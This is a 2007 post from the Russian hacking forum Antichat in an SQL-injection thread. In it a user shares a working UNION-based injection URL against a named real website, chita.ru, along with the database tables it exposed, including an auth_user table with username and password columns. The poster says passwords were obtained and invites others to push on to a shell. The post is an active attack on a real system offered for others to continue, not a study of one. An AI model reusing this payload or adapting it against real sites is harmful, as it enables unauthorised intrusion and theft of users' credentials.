Форум АНТИЧАТ - SQL Инъекции

#11

15.08.2007, 23:39

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

Отправить сообщение для Red_Red1 с помощью ICQ

Цитата:

http://www.chita.ru/firms/index.php?page=view&id=-9302+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24+from+infor mation_schema.tables+WHERE+TABLE_NAME+NOT+IN+(CHAR (67,72,65,82,65,67,84,69,82,95,83,69,84,83))/*

Вот решил запостить, мне понравилось тут раскапывать. Интересно работать с пятой версией мускула но...
Таблицы найдены, пароли получены, вот только куда их подставлять я не нашел - может кто докопает. Я эту скулю у себя хранил долго, покуда не разузнал про пятую версию мускула, а потом ковырялся в старых залежах набрал version() и о чудо 5.ХХ.ХХ, а это значит можно узнать все таблицы и т.д.!!!!!
Вот кстати и таблички

Цитата:

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
auth_user id, site_id, username, password, permis, userlevel - это столбики
forget_psw
images
inetcat_anti_cheat
proxys
sessions
sites
user_tables
user_tables_fields
user_tables_params
ut_afisha
ut_brd
ut_brd_users
ut_citys
ut_firm_offers
ut_firms
ut_inetcat
ut_money
ut_news
ut_news_nlist
ut_offer_types
ut_sources
ut_tv
ut_tv_descrs
ut_tv_genres

Жаль до шелла не дошло.... может кто???..., а нет так и ладно